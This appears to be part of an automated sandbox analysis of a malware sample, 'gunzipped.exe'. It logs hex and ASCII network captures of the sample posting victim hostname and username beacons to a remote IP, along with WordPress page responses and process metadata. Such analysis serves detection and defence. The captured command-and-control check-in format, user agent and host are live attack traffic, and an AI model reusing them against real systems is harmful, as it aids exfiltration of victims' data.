Apr 17, 2024 03:18:52.030955076 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:52.030992985 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:52.031032085 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	49793	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:52.381113052 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:52.589148998 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:53.502126932 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:52 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:53.502182961 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:53.502221107 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:53.502300024 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:53.502338886 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:53.502376080 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:53.502412081 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:53.502450943 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:53.502489090 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:53.502527952 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.5	49794	136.244.109.75	80

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:53.924912930 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:54.136291027 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:55.068927050 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:54 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:55.068984985 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:55.069022894 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:55.069061041 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:55.069101095 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:55.069139004 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:55.069179058 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:55.069219112 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:55.069256067 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:55.069295883 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Target ID:	0
Start time:	03:16:46
Start date:	17/04/2024
Path:	C:\Users\user\Desktop\gunzipped.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\gunzipped.exe"
Imagebase:	0x220000
File size:	553'984 bytes
MD5 hash:	8864B52D242037414B7C4A230C390AB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
